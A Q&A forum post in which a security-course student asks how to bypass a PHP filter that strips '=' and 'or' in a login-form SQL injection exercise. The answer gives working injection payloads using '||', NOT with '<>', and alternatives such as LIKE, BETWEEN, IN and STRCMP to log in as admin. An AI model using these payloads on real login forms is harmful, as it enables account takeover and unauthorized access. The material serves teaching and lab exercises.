SQL injection with php filtering

Question

I have to inject a login form for exercise about a computer security course .... I have passed the first level using the simple

\' like 1=1--

Answer 1

Assuming this definition of lvl2_filter, which basically removes any occurrence of = and or until no longer found, it should still be possible to use the logical OR operation with || instead of OR and a simple expression that evaluates to true like:

username: dummy
password: ' || '1

This would result in:

SELECT user_id FROM users WHERE username='dummy' and password='' || '1'

For selecting a specific user, one can use the rules of boolean algebra, where x=y = !(x!=y):

username: dummy
password: ' || NOT(username<>'admin') AND '1

This would result in:

SELECT user_id FROM users WHERE username='dummy' and password='' || NOT(username<>'admin') AND '1'

Here <> is equivalent to != but doesn’t contain a =.

There are also other operations that one could use ensure username equals admin:

• username BETWEEN 'admin' AND 'admin'
• username LIKE 'admin'
• username IN ('admin')
• IF(STRCMP(username,'admin'), 0, 1)
• CASE STRCMP(username,'admin') WHEN 0 THEN 1 ELSE 0 END
• …